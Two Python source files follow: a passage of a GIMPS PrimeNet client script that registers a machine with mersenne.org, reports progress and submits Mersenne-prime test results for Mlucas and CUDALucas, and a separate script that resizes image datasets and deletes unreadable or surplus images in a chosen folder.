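#   parse_v5_resp("pnErrorResult=0\npnErrorDetail=SUCCESS\n==END==\nignored=1")
# returns {'pnErrorResult': '0', 'pnErrorDetail': 'SUCCESS'}: everything
# after the ==END== marker is dropped and all values stay strings.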
def send_request(guid, args):
args["g"] = guid
# to mimic mprime, it is necessary to add safe='"{}:,' argument to urlencode, in
# particular to encode JSON in result submission. But safe is not supported by python2...
url_args = urlencode(args)
url_args += "&ss=19191919&sh=ABCDABCDABCDABCDABCDABCDABCDABCD"
try:
r = requests.get(primenet_v5_burl+url_args)
result = parse_v5_resp(r.text)
rc = int(result["pnErrorResult"])
if rc:
if rc in errors:
resmsg = errors[rc]
else:
resmsg = "Unknown error code"
debug_print("PrimeNet error " + str(rc) +
": " + resmsg, file=sys.stderr)
debug_print(result["pnErrorDetail"], file=sys.stderr)
else:
if result["pnErrorDetail"] != "SUCCESS":
debug_print("PrimeNet success code with additional info:")
debug_print(result["pnErrorDetail"])
except HTTPError as e:
debug_print("ERROR receiving answer to request: " +
str(primenet_v5_burl+url_args), file=sys.stderr)
debug_print(e, file=sys.stderr)
return None
except ConnectionError as e:
debug_print("ERROR connecting to server for request: " +
str(primenet_v5_burl+url_args), file=sys.stderr)
debug_print(e, file=sys.stderr)
return None
return result
def create_new_guid():
guid = hex(getrandbits(128))
if guid[:2] == '0x':
guid = guid[2:] # remove the 0x prefix
if guid[-1] == 'L':
guid = guid[:-1] # remove trailing 'L' in python2
# pad with leading zeros to 32 hex characters
guid = (32-len(guid))*"0" + guid
return guid
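# Example: 128 random bits -> 32 lowercase hex characters, left-padded with
# zeros, e.g. (hypothetical) '00f3a91c6e2d4b8897aa01c5de43b210'.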
def register_instance(guid):
# register the instance to server, guid is the instance identifier
if options.username is None or options.hostname is None:
parser.error(
"To register the instance, --username and --hostname are required")
hardware_id = sha256(options.cpu_model.encode(
"utf-8")).hexdigest()[:32] # similar as mprime
args = primenet_v5_bargs.copy()
args["t"] = "uc" # update compute command
args["a"] = platform.system() + ('64' if platform.machine().endswith('64')
else '') + ",Mlucas,v" + str(VERSION)
if config.has_option("primenet", "sw_version"):
args["a"] = config.get("primenet", "sw_version")
args["wg"] = "" # only filled on Windows by mprime
args["hd"] = hardware_id # 32 hex char (128 bits)
args["c"] = options.cpu_model[:64] # CPU model (len between 8 and 64)
args["f"] = options.features[:64] # CPU option (like asimd, max len 64)
args["L1"] = options.L1 # L1 cache size in KBytes
args["L2"] = options.L2 # L2 cache size in KBytes
# if smaller than or equal to 256,
# the server refuses to give an LL assignment
args["np"] = options.np # number of cores
args["hp"] = options.hp # number of hyperthreading cores
args["m"] = options.memory # number of megabytes of physical memory
args["s"] = options.frequency # CPU frequency
args["h"] = 24 # pretend to run 24h/day
args["r"] = 0 # pretend to run at 100%
args["u"] = options.username #
args["cn"] = options.hostname[:20] # truncate to 20 char max
if guid is None:
guid = create_new_guid()
result = send_request(guid, args)
if result is None or int(result["pnErrorResult"]) != 0:
parser.error("Error while registering on mersenne.org")
# Save program options in case they are changed by the PrimeNet server.
config.set("primenet", "username", result["u"])
config.set("primenet", "name", result["un"])
config.set("primenet", "hostname", result["cn"])
merge_config_and_options(config, options)
config_write(config, guid=guid)
program_options(guid)
print("GUID {guid} correctly registered with the following features:".format(
guid=guid))
print("Username: {0}".format(options.username))
print("Computer name: {0}".format(options.hostname))
print("CPU model: {0}".format(options.cpu_model))
print("CPU features: {0}".format(options.features))
print("CPU L1 Cache size: {0} KIB".format(options.L1))
print("CPU L2 Cache size: {0} KiB".format(options.L2))
print("CPU cores: {0}".format(options.np))
print("CPU threads per core: {0}".format(options.hp))
print("CPU frequency: {0} MHz".format(options.frequency))
print("Total RAM: {0} MiB".format(options.memory))
print(u"If you want to change the value, please edit the “" +
options.localfile + u"” file")
print("You can see the result in this page:")
print("https://www.mersenne.org/editcpu/?g={guid}".format(guid=guid))
return
def config_read():
config = ConfigParser(dict_type=OrderedDict)
try:
config.read([localfile])
except ConfigParserError as e:
debug_print("ERROR reading {0} file:".format(
localfile), file=sys.stderr)
debug_print(e, file=sys.stderr)
if not config.has_section("primenet"):
# Create the section to avoid having to test for it later
config.add_section("primenet")
return config
def get_guid(config):
try:
return config.get("primenet", "guid")
except ConfigParserError:
return None
def config_write(config, guid=None):
# generate a new local.ini file
if guid is not None: # update the guid if necessary
config.set("primenet", "guid", guid)
with open(localfile, "w") as configfile:
config.write(configfile)
def merge_config_and_options(config, options):
# getattr and setattr allow access to the options.xxxx values by name
# which allows copying all of them programmatically instead of having
# one line per attribute. Only the attr_to_copy list needs to be updated
# when adding an option you want to copy from argument options to local.ini config.
attr_to_copy = ["workfile", "resultsfile", "username", "password", "worktype", "num_cache", "days_work",
"hostname", "cpu_model", "features", "frequency", "memory", "L1", "L2", "np", "hp", "gpu"]
updated = False
for attr in attr_to_copy:
# if "attr" has its default value in options, copy it from config
attr_val = getattr(options, attr)
if not hasattr(opts_no_defaults, attr) \
and config.has_option("primenet", attr):
# If no option is given and the option exists in local.ini, take it from local.ini
new_val = config.get("primenet", attr)
# config file values are always str()
# they need to be converted to the expected type from options
if attr_val is not None:
new_val = type(attr_val)(new_val)
setattr(options, attr, new_val)
elif attr_val is not None and (not config.has_option("primenet", attr)
or config.get("primenet", attr) != str(attr_val)):
# If an option is given (even default value) and it is not already
# identical in local.ini, update local.ini
debug_print(u"update “" + options.localfile +
u"” with {0}={1}".format(attr, attr_val))
config.set("primenet", attr, str(attr_val))
updated = True
global localfile
global workfile
global resultsfile
localfile = os.path.join(workdir, options.localfile)
workfile = os.path.join(workdir, options.workfile)
resultsfile = os.path.join(workdir, options.resultsfile)
return updated
Assignment = namedtuple('Assignment', "id p is_prp iteration usec_per_iter")
def update_progress():
w = readonly_list_file(workfile)
tasks = greplike(workpattern, w)
if not len(tasks):
return # don't update if no worktodo
config_updated = False
# Treat the first assignment. Only this one is used to save the usec_per_iter
# The idea is that the first assignment is the one having a .stat file with correct values
# Most of the time, a later assignment would not have a .stat file to obtain information,
# but if it has one, it may come from another computer if the user moved the files, and so
# it doesn't have relevant values for speed estimation.
# Using usec_per_iter from one p to another is a good estimation if both p are close enough;
# if there is a big gap, it will be over- or under-estimated.
# Any idea for a better estimation of assignment duration when only p and type (LL or PRP) is known ?
assignment = get_progress_assignment(tasks[0])
usec_per_iter = assignment.usec_per_iter
if usec_per_iter is not None:
config.set("primenet", "usec_per_iter",
"{0:.2f}".format(usec_per_iter))
config_updated = True
elif config.has_option("primenet", "usec_per_iter"):
# If not speed available, get it from the local.ini file
usec_per_iter = float(config.get("primenet", "usec_per_iter"))
percent, time_left = compute_progress(
assignment.p, assignment.iteration, usec_per_iter)
debug_print("p:{0} is {1:.2f}% done".format(assignment.p, percent))
if time_left is None:
debug_print("Finish cannot be estimated")
else:
debug_print("Finish estimated in {0:.1f} days (used {1:.1f} msec/iter estimation)".format(
time_left/3600/24, usec_per_iter))
send_progress(assignment.id, assignment.is_prp, percent, time_left)
# Do the other assignments, accumulating the time_lefts
cur_time_left = time_left
for task in tasks[1:]:
assignment = get_progress_assignment(task)
percent, time_left = compute_progress(
assignment.p, assignment.iteration, usec_per_iter)
debug_print("p:{0} is {1:.2f}% done".format(assignment.p, percent))
if time_left is None:
debug_print("Finish cannot be estimated")
else:
cur_time_left += time_left
debug_print("Finish estimated in {0:.1f} days (used {1:.1f} msec/iter estimation)".format(
cur_time_left/3600/24, usec_per_iter))
send_progress(assignment.id, assignment.is_prp,
percent, cur_time_left)
if config_updated:
config_write(config)
return percent, cur_time_left
def get_progress_assignment(task):
''' Ex: Test=197ED240A7A41EC575CB408F32DDA661,57600769,74 '''
found = workpattern.search(task)
debug_print(task)  # log the raw worktodo entry only when --debug is set
if not found:
debug_print("ERROR: Unable to extract valid PrimeNet assignment ID from entry in " +
workfile + ": " + str(task[0]), file=sys.stderr)
return
assignment_id = found.group(2) # e.g., "197ED240A7A41EC575CB408F32DDA661"
is_prp = found.group(1) == "PRP" # e.g., "Test"
debug_print("type = {0}, assignment_id = {1}".format(
found.group(1), assignment_id)) # e.g., "57600769", "197ED240A7A41EC575CB408F32DDA661"
found = task.split(",")
idx = 3 if is_prp else 1
if len(found) <= idx:
debug_print("Unable to extract valid exponent substring from entry in " +
workfile + ": " + str(task))
return None  # keep the failure value consistent with the AID-parse failure above
# Extract the subfield containing the exponent, whose position depends on the assignment type:
p = int(found[idx])
if not options.gpu:
iteration, usec_per_iter = parse_stat_file(p)
else:
iteration, usec_per_iter = parse_stat_file_cuda()
return Assignment(assignment_id, p, is_prp, iteration, usec_per_iter)
def parse_stat_file_cuda():
# CUDALucas only function
# appended line by line, no lock needed
if not os.path.exists(options.gpu):
print("ERROR: GPU file does not exist")
return 0, None
w = readonly_list_file(options.gpu)
found = 0
iter_regex = re.compile(r'\b\d{5,}\b')
ms_per_regex = re.compile(r'\b\d+\.\d+\b')
list_msec_per_iter = []
# get the 5 most recent Iter line
for line in reversed(w):
iter_res = re.findall(iter_regex, line)
ms_res = re.findall(ms_per_regex, line)
# regex matches, but not when cudalucas is continuing
# if iter_res and ms_res and "Compatibility" not in line and "Continuing" not in line and "M(" not in line:
if iter_res and ms_res:
found += 1
# keep the last iteration to compute the percent of progress
if found == 1:
iteration = int(iter_res[1])
elif int(iter_res[1]) > iteration:
break
msec_per_iter = float(ms_res[1])
list_msec_per_iter.append(msec_per_iter)
if found == 5:
break
if found == 0:
return 0, None # iteration is 0, but don't know the estimated speed yet
# take the median of the last grepped lines
msec_per_iter = median_low(list_msec_per_iter)
return iteration, msec_per_iter
def compute_progress(p, iteration, usec_per_iter):
percent = 100*float(iteration)/float(p)
if usec_per_iter is None:
return percent, None
iteration_left = p - iteration
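    # Note: despite the parameter name, usec_per_iter actually carries milliseconds
    # per iteration here (see parse_stat_file_cuda and the "msec/iter" log text),
    # so dividing by 1000 yields an estimate in seconds.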
time_left = int(usec_per_iter * iteration_left / 1000)
return percent, time_left
def send_progress(assignment_id, is_prp, percent, time_left, retry_count=0):
guid = get_guid(config)
if guid is None:
debug_print("Cannot update, the registration is not done",
file=sys.stderr)
return
if retry_count > 5:
return
# Assignment Progress fields:
# g= the machine's GUID (32 chars, assigned by Primenet on 1st-contact from a given machine, stored in 'guid=' entry of local.ini file of rundir)
#
args = primenet_v5_bargs.copy()
args["t"] = "ap" # update compute command
    # k= the assignment ID (32 chars, follows '=' in Primenet-generated workfile entries)
args["k"] = assignment_id
# p= progress in %-done, 4-char format = xy.z
args["p"] = "{0:.1f}".format(percent)
# d= when the client is expected to check in again (in seconds ... )
args["d"] = options.timeout if options.timeout else 24*3600
# e= the ETA of completion in seconds, if unknown, just put 1 week
args["e"] = time_left if time_left is not None else 7*24*3600
# c= the worker thread of the machine ... always sets = 0 for now, elaborate later if desired
args["c"] = options.cpu
# stage= LL in this case, although an LL test may be doing TF or P-1 work first so it's possible to be something besides LL
if not is_prp:
args["stage"] = "LL"
retry = False
result = send_request(guid, args)
if result is None:
debug_print("ERROR while updating on mersenne.org", file=sys.stderr)
# Try again
retry = True
else:
rc = int(result["pnErrorResult"])
if rc == primenet_api.ERROR_OK:
debug_print("Update correctly sent to server")
else:
if rc == primenet_api.ERROR_STALE_CPU_INFO:
debug_print("STALE CPU INFO ERROR: re-send computer update")
register_instance(guid)
retry = True
elif rc == primenet_api.ERROR_UNREGISTERED_CPU:
debug_print(
"UNREGISTERED CPU ERROR: pick a new GUID and register again")
register_instance(None)
retry = True
elif rc == primenet_api.ERROR_SERVER_BUSY:
retry = True
else:
# TODO: treat more errors correctly in all send_request callers
# primenet_api.ERROR_INVALID_ASSIGNMENT_KEY
# primenet_api.ERROR_WORK_NO_LONGER_NEEDED
# drop the assignment
debug_print("ERROR while updating on mersenne.org",
file=sys.stderr)
if retry:
return send_progress(assignment_id, is_prp, percent, time_left, retry_count+1)
return
def get_cuda_ar_object(sendline):
# CUDALucas only function
# sendline example: 'M( 108928711 )C, 0x810d83b6917d846c, offset = 106008371, n = 6272K, CUDALucas v2.06, AID: 02E4F2B14BB23E2E4B95FC138FC715A8'
ar = {}
# args example: ['M( 108928711 )C', '0x810d83b6917d846c', 'offset = 106008371', 'n = 6272K', 'CUDALucas v2.06', 'AID: 02E4F2B14BB23E2E4B95FC138FC715A8']
    args = [x.strip() for x in sendline.split(",")]
ar['aid'] = args[5][5:]
ar['worktype'] = 'LL' # CUDAlucas only does LL tests
# the else does not matter in Loarer's program
ar['status'] = 'P' if int(args[1], 0) == 0 else 'R'
ar['exponent'] = re.search(r'\d{5,}', args[0]).group(0)
ar['res64'] = args[1][2:]
ar['shift-count'] = args[2].strip("offset = ")
ar['error-code'] = "00000000"
ar['fft-length'] = str(int(args[3].strip("n = ").strip("K")) * 1000)
return ar
def submit_one_line(sendline):
"""Submit one line"""
if not options.gpu: # MLucas
try:
ar = json.loads(sendline)
is_json = True
        except json.decoder.JSONDecodeError:
            is_json = False
            ar = None  # ensure ar is defined; otherwise the check below raises NameError
else: # CUDALucas
ar = get_cuda_ar_object(sendline)
guid = get_guid(config)
if guid is not None and ar is not None and (options.gpu or is_json):
        # If registered and the line was parsed successfully (JSON for MLucas,
        # a parsed ar object for CUDALucas), submit using the v5 API;
        # the result will be attributed to the registered computer
sent = submit_one_line_v5(sendline, guid, ar)
else:
# The result will be attributed to "Manual testing"
sent = submit_one_line_manually(sendline)
return sent
def announce_prime_to_user(exponent, worktype):
for i in range(3):
print('\a')
time.sleep(.5)
if worktype == 'LL':
print("New Mersenne Prime!!!! M"+exponent+" is prime!")
else:
print("New Probable Prime!!!! "+exponent+" is a probable prime!")
def get_result_type(ar):
"""Extract result type from JSON result"""
if ar['worktype'] == 'LL':
if ar['status'] == 'P':
announce_prime_to_user(ar['exponent'], ar['worktype'])
return primenet_api.PRIMENET_AR_LL_PRIME
else:
return primenet_api.PRIMENET_AR_LL_RESULT
elif ar['worktype'].startswith('PRP'):
if ar['status'] == 'P':
announce_prime_to_user(ar['exponent'], ar['worktype'])
return primenet_api.PRIMENET_AR_PRP_PRIME
else:
return primenet_api.PRIMENET_AR_PRP_RESULT
else:
raise ValueError(
"This is a bug in primenet.py, Unsupported worktype {0}".format(ar['worktype']))
def submit_one_line_v5(sendline, guid, ar):
"""Submit one result line using V5 API, will be attributed to the computed identified by guid"""
"""Return False if the submission should be retried"""
# JSON is required because assignment_id is necessary in that case
# and it is not present in old output format.
debug_print("Submitting using V5 API\n" + sendline)
    aid = ar['aid'] if 'aid' in ar else 0  # guard against a missing AID (matches the "k" arg below)
result_type = get_result_type(ar)
args = primenet_v5_bargs.copy()
args["t"] = "ar" # assignment result
args["k"] = ar['aid'] if 'aid' in ar else 0 # assignment id
args["m"] = sendline # message is the complete JSON string
args["r"] = result_type # result type
args["d"] = 1 # done: 0 for no closing is used for partial results
args["n"] = ar['exponent']
if result_type in (primenet_api.PRIMENET_AR_LL_RESULT, primenet_api.PRIMENET_AR_LL_PRIME):
if result_type == primenet_api.PRIMENET_AR_LL_RESULT:
args["rd"] = ar['res64']
if 'shift-count' in ar:
args['sc'] = ar['shift-count']
if 'error-code' in ar:
args["ec"] = ar['error-code']
elif result_type in (primenet_api.PRIMENET_AR_PRP_RESULT, primenet_api.PRIMENET_AR_PRP_PRIME):
args.update((("A", 1), ("b", 2), ("c", -1)))
if result_type == primenet_api.PRIMENET_AR_PRP_RESULT:
args["rd"] = ar['res64']
if 'error-code' in ar:
args["ec"] = ar['error-code']
if 'known-factors' in ar:
args['nkf'] = len(ar['known-factors'])
args["base"] = ar['worktype'][4:] # worktype == PRP-base
if 'residue-type' in ar:
args["rt"] = ar['residue-type']
if 'shift-count' in ar:
args['sc'] = ar['shift-count']
if 'errors' in ar:
args['gbz'] = 1
args['fftlen'] = ar['fft-length']
result = send_request(guid, args)
if result is None:
debug_print("ERROR while submitting result on mersenne.org: assignment_id={0}".format(
aid), file=sys.stderr)
# if this happens, the submission can be retried
# since no answer has been received from the server
return False
else:
return return_code(result, aid)
def submit_one_line_manually(sendline):
"""Submit results using manual testing, will be attributed to "Manual Testing" in mersenne.org"""
debug_print("Submitting using manual results\n" + sendline)
try:
url = primenet_baseurl + "manual_result/default.php"
r = s.post(url, data={"data": sendline})
res_str = r.text
if "Error" in res_str:
ibeg = res_str.find("Error")
iend = res_str.find("</div>", ibeg)
print("Submission failed: '{0}'".format(res_str[ibeg:iend]))
elif "Accepted" in res_str:
pass
else:
print("submit_work: Submission of results line '" + sendline +
"' failed for reasons unknown - please try manual resubmission.")
except ConnectionError:
debug_print("URL open ERROR")
return True # EWM: Append entire results_send rather than just sent to avoid resubmitting
# bad results (e.g. previously-submitted duplicates) every time the script executes.
def submit_work():
results_send = readonly_list_file(sentfile)
# Only submit completed work, i.e. the exponent must not exist in worktodo file any more
# appended line by line, no lock needed
results = readonly_list_file(resultsfile)
# EWM: Note that readonly_list_file does not need the file(s) to exist - nonexistent files simply yield 0-length rs-array entries.
# remove nonsubmittable lines from list of possibles
results = filter(mersenne_find, results)
# if a line was previously submitted, discard
results_send = [line for line in results if line not in results_send]
# Only for new results, to be appended to results_sent
sent = []
if len(results_send) == 0:
debug_print("No complete results found to send.")
return
# EWM: Switch to one-result-line-at-a-time submission to support error-message-on-submit handling:
for sendline in results_send:
# case where password is entered (not needed in v5 API since we have a key)
if options.password:
is_sent = submit_one_line_manually(sendline)
else:
is_sent = submit_one_line(sendline)
if is_sent:
sent.append(sendline)
write_list_file(sentfile, sent, "a")
#######################################################################################################
#
# Start main program here
#
#######################################################################################################
parser = optparse.OptionParser(version="%prog 1.0", description=u"""This program will automatically get assignments, report assignment results and optionally progress to PrimeNet for both the CUDALucas and Mlucas GIMPS programs. It also saves its configuration to a “local.ini” file, so it is only necessary to give most of the arguments the first time it is run.
The first time it is run, if a password is NOT provided, it will register the current CUDALucas/Mlucas instance with PrimeNet (see below).
Then, it will get assignments, report the results and progress, if registered, to PrimeNet on a “timeout” interval, or only once if timeout is 0.
"""
)
# options not saved to local.ini
parser.add_option("-d", "--debug", action="count", dest="debug",
default=False, help="Display debugging info")
parser.add_option("-w", "--workdir", dest="workdir", default=".",
help=u"Working directory with “worktodo.ini” and “results.txt” from the GIMPS program, and “local.ini” from this program, Default: %default (current directory)")
parser.add_option("-i", "--workfile", dest="workfile",
default="worktodo.ini", help=u"WorkFile filename, Default: “%default”")
parser.add_option("-r", "--resultsfile", dest="resultsfile",
default="results.txt", help=u"ResultsFile filename, Default: “%default”")
parser.add_option("-l", "--localfile", dest="localfile", default="local.ini",
help=u"Local configuration file filename, Default: “%default”")
# all other options are saved to local.ini
parser.add_option("-u", "--username", dest="username",
help="GIMPS/PrimeNet User ID. Create a GIMPS/PrimeNet account: https://www.mersenne.org/update/. If you do not want a PrimeNet account, you can use ANONYMOUS.")
parser.add_option("-p", "--password", dest="password",
help="GIMPS/PrimeNet Password. Only provide if you want to do manual testing and not report the progress (not recommend). This was the default behavior for old versions of this script.")
# -t is reserved for timeout, instead use -T for assignment-type preference:
parser.add_option("-T", "--worktype", dest="worktype", default="100", help="""Type of work, Default: %default,
100 (smallest available first-time LL),
101 (double-check LL),
102 (world-record-sized first-time LL),
104 (100M digit number to LL test - not recommended),
150 (smallest available first-time PRP),
151 (double-check PRP),
152 (world-record-sized first-time PRP),
153 (100M digit number to PRP test)
"""
)
# parser.add_option("-g", "--gpu", action="store_true", dest="gpu", default=False,
parser.add_option("-g", "--gpu", dest="gpu", help="Get assignments for a GPU (CUDALucas) instead of the CPU (Mlucas). This flag takes as an argument the CUDALucas output filename.")
parser.add_option("-c", "--cpu_num", dest="cpu", type="int", default=0,
help="CPU core or GPU number to get assignments for, Default: %default")
parser.add_option("-n", "--num_cache", dest="num_cache", type="int",
default=0, help="Number of assignments to cache, Default: %default")
parser.add_option("-L", "--days_work", dest="days_work", type="int", default=3,
help="Days of work to queue, Default: %default days. Add one to num_cache when the time left for the current assignment is less then this number of days.")
parser.add_option("-t", "--timeout", dest="timeout", type="int", default=60*60*6,
help="Seconds to wait between network updates, Default: %default seconds (6 hours). Use 0 for a single update without looping.")
parser.add_option("--unreserve_all", action="store_true", dest="unreserve_all", default=False, help="Unreserve all assignments and exit. Requires that the instance is registered with PrimeNet.")
group = optparse.OptionGroup(parser, "Registering Options: sent to PrimeNet/GIMPS when registering. The progress will automatically be sent and the program can then be monitored on the GIMPS website CPUs page (https://www.mersenne.org/cpus/), just like with Prime95/MPrime. This also allows for the program to get much smaller Category 0 and 1 exponents, if it meets the other requirements (https://www.mersenne.org/thresholds/).")
group.add_option("-H", "--hostname", dest="hostname",
default=platform.node()[:20], help="Computer name, Default: %default")
# TODO: add detection for most parameters, including automatic handling of hardware changes
group.add_option("--cpu_model", dest="cpu_model", default=cpu_signature,
help="Processor (CPU) model, Default: %default")
group.add_option("--features", dest="features", default="",
help="CPU features, Default: '%default'")
group.add_option("--frequency", dest="frequency", type="int",
default=1000, help="CPU frequency (MHz), Default: %default MHz")
group.add_option("-m", "--memory", dest="memory", type="int",
default=0, help="Total memory (RAM) (MiB), Default: %default MiB")
group.add_option("--L1", dest="L1", type="int", default=8,
help="L1 Cache size (KiB), Default: %default KiB")
group.add_option("--L2", dest="L2", type="int", default=512,
help="L2 Cache size (KiB), Default: %default KiB")
group.add_option("--np", dest="np", type="int", default=1,
help="Number of CPU Cores, Default: %default")
group.add_option("--hp", dest="hp", type="int", default=0,
help="Number of CPU threads per core (0 is unknown), Default: %default")
parser.add_option_group(group)
#(options, args) = parser.parse_args()
#print(options)
opts_no_defaults = optparse.Values()
__, args = parser.parse_args(values=opts_no_defaults)
options = optparse.Values(parser.get_default_values().__dict__)
options._update_careful(opts_no_defaults.__dict__)
progname = os.path.basename(sys.argv[0])
workdir = os.path.expanduser(options.workdir)
localfile = os.path.join(workdir, options.localfile)
workfile = os.path.join(workdir, options.workfile)
resultsfile = os.path.join(workdir, options.resultsfile)
# print(opts_no_defaults)
# print(options)
# A cumulative backup
sentfile = os.path.join(workdir, "results_sent.txt")
# Good refs re. Python regexp: https://www.geeksforgeeks.org/pattern-matching-python-regex/, https://www.python-course.eu/re.php
# pre-v19 only handled LL-test assignments starting with either DoubleCheck or Test, followed by =, and ending with 3 ,number pairs:
#
# workpattern = r"(DoubleCheck|Test)=.*(,[0-9]+){3}"
#
# v19 we add PRP-test support - both first-time and DC of these start with PRP=, the DCs tack on 2 more ,number pairs representing
# the PRP base to use and the PRP test-type (the latter is a bit complex to explain here). Sample of the 4 worktypes supported by v19:
#
# Test=7A30B8B6C0FC79C534A271D9561F7DCC,89459323,76,1
# DoubleCheck=92458E009609BD9E10577F83C2E9639C,50549549,73,1
# PRP=BC914675C81023F252E92CF034BEFF6C,1,2,96364649,-1,76,0
# PRP=51D650F0A3566D6C256B1679C178163E,1,2,81348457,-1,75,0,3,1
#
# and the obvious regexp pattern-modification is
#
# workpattern = r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}"
#
# Here is where we get to the kind of complication the late baseball-philosopher Yogi Berra captured via his aphorism,
# "In theory, theory and practice are the same. In practice, they're different". Namely, while the above regexp pattern
# should work on all 4 assignment patterns, since each has a string of at least 3 comma-separated nonnegative ints somewhere
# between the 32-hexchar assignment ID and end of the line, said pattern failed on the 3rd of the above 4 assignments,
# apparently because when the regexp is done via the 'greplike' below, the (,[0-9]+){3} part of the pattern gets implicitly
# tiled to the end of the input line. Assignment # 3 above happens to have a negative number among the final 3, thus the
# grep fails. This weird behavior is not reproducible running Python in console mode:
#
# >>> import re
# >>> s1 = "DoubleCheck=92458E009609BD9E10577F83C2E9639C,50549549,73,1"
# >>> s2 = "Test=7A30B8B6C0FC79C534A271D9561F7DCC,89459323,76,1"
# >>> s3 = "PRP=BC914675C81023F252E92CF034BEFF6C,1,2,96364649,-1,76,0"
# >>> s4 = "PRP=51D650F0A3566D6C256B1679C178163E,1,2,81348457,-1,75,0,3,1"
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s1)
# <_sre.SRE_Match object at 0x1004bd250>
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s2)
# <_sre.SRE_Match object at 0x1004bd250>
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s3)
# <_sre.SRE_Match object at 0x1004bd250>
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s4)
# <_sre.SRE_Match object at 0x1004bd250>
#
# Anyhow, based on that I modified the grep pattern to work around the weirdness, by appending .* to the pattern, thus
# changing things to "look for 3 comma-separated nonnegative ints somewhere in the assignment, followed by anything",
# also now to specifically look for a 32-hexchar assignment ID preceding such a triplet, and to allow whitespace around
# the =. The latter bit is not needed based on current server assignment format, just a personal aesthetic bias of mine:
#
workpattern = re.compile(
    r"(DoubleCheck|Test|PRP)\s*=\s*([0-9A-F]{32})(,[0-9]+){3}.*")
# mersenne.org limit is about 4 KB; stay on the safe side
sendlimit = 3000 # TODO: enforce this limit
# If debug is requested
# https://stackoverflow.com/questions/10588644/how-can-i-see-the-entire-http-request-thats-being-sent-by-my-python-application
if options.debug > 1:
try:
import http.client as http_client
except ImportError:
# Python 2
import httplib as http_client
http_client.HTTPConnection.debuglevel = options.debug
# You must initialize logging, otherwise you'll not see debug output.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
# load local.ini and update options
config = config_read()
config_updated = merge_config_and_options(config, options)
# check options after merging so that if local.ini file is changed by hand,
# values are also checked
# TODO: check that input char are ascii or at least supported by the server
if not (8 <= len(options.cpu_model) <= 64):
parser.error("cpu_model must be between 8 and 64 characters")
if options.hostname is not None and len(options.hostname) > 20:
parser.error("hostname must be less than 21 characters")
if options.features is not None and len(options.features) > 64:
parser.error("features must be less than 64 characters")
# write back local.ini if necessary
if config_updated:
debug_print("write " + options.localfile)
config_write(config)
# if guid already exist, recover it, this way, one can (re)register to change
# the CPU model (changing instance name can only be done in the website)
guid = get_guid(config)
if options.username is None:
parser.error("Username must be given")
if options.unreserve_all:
unreserve_all(guid)
sys.exit(0)
program = "CUDALucas" if options.gpu else "MLucas"
while True:
# Carry on with Loarer's style of primenet
try:
if options.password:
login_data = {"user_login": options.username,
"user_password": options.password}
url = primenet_baseurl + "default.php"
r = s.post(url, data=login_data)
if options.username + "<br>logged in" not in r.text:
primenet_login = False
debug_print("ERROR: Login failed.")
else:
primenet_login = True
# use the v5 API for registration and program options
else:
if guid is None:
register_instance(guid)
if options.timeout <= 0:
break
# worktype has changed, update worktype preference in program_options()
# if config_updated:
elif config_updated:
program_options(guid)
    except HTTPError as e:
        debug_print("ERROR: Login failed: {0}".format(e))
# branch 1 or branch 2 above was taken
if not options.password or (options.password and primenet_login):
submit_work()
progress = update_progress()
got = get_assignment(progress)
debug_print("Got: " + str(got))
if got > 0 and not options.password:
debug_print(
"Redo progress update to update the just obtain assignmment(s)")
time.sleep(1)
update_progress()
if options.timeout <= 0:
break
try:
time.sleep(options.timeout)
except KeyboardInterrupt:
break
sys.exit(0)
ad913bd95aa72f25fb5ddbcc5d7a7d7533605cc4 | 2,475 | py | Python | file_number_remove_resize.py | sshhoo/ica | 6bf982b22633e18157491b32a6815d898557ccf9 | ["Apache-2.0"]
import os
import sys  # needed for sys.exit() below; missing from the original imports
import argparse
import imghdr
from PIL import Image
from PIL import ImageFile
import tensorflow as tf
assert tf.__version__.startswith('2')
parser=argparse.ArgumentParser()
parser.add_argument('--file_number',type=int,default=10000000000000,help='maximum number of images to keep per folder')
parser.add_argument('--image_dir',type=str,default='_',help='Path to folders of images.')
parser.add_argument('--resize_int',type=int,default=-1,help='target square size in pixels (-1 disables processing)')
args=parser.parse_args()
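# Example invocation (illustrative; the paths are hypothetical):
#   python file_number_remove_resize.py --image_dir images/ --resize_int 224 --file_number 500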
# allow Pillow to load truncated images without raising
ImageFile.LOAD_TRUNCATED_IMAGES=True
if args.image_dir!='_':
if args.image_dir[-1]!='/':
print('Add / as the last character, please.')
print(args.image_dir)
sys.exit(1)
if args.resize_int!=-1:
resize_dir_name=args.image_dir.split('/')[0]
if not os.path.exists(f'{args.resize_int}_resized_{resize_dir_name}/'):
os.makedirs(f'{args.resize_int}_resized_{resize_dir_name}/')
for (dir,subs,files) in os.walk(args.image_dir):
if dir==args.image_dir:
subdir_list=subs
for i in range(len(subdir_list)):
if not os.path.exists(f'{args.resize_int}_resized_{resize_dir_name}/{subdir_list[i]}/'):
os.makedirs(f'{args.resize_int}_resized_{resize_dir_name}/{subdir_list[i]}/')
for (dir,subs,files) in os.walk(args.image_dir):
count=0
for file in files:
target=os.path.join(dir,file)
if os.path.isfile(target):
if imghdr.what(target)!=None:
target_list=target.split('/')
target_list[0]=f'{args.resize_int}_resized_{resize_dir_name}'
if os.path.isfile('/'.join(target_list)):
continue
try:
                # verify the image decodes cleanly with TensorFlow
img_raw=tf.io.read_file(target)
img_tensor=tf.image.decode_image(img_raw)
if count>=args.file_number:
print(target)
os.remove(target)
else:
try:
                        # open and resize with Pillow
img=Image.open(target)
img_resize=img.resize((args.resize_int,args.resize_int))
try:
img_resize.save('/'.join(target_list))
try:
                                # verify the resized file also decodes with TensorFlow
img_raw_resize=tf.io.read_file('/'.join(target_list))
img_tensor_resize=tf.image.decode_image(img_raw_resize)
count+=1
except:
print('/'.join(target_list))
os.remove('/'.join(target_list))
except:
print(target)
os.remove(target)
except:
print(target)
os.remove(target)
except:
print(target)
os.remove(target)
else:
print(target)
os.remove(target)
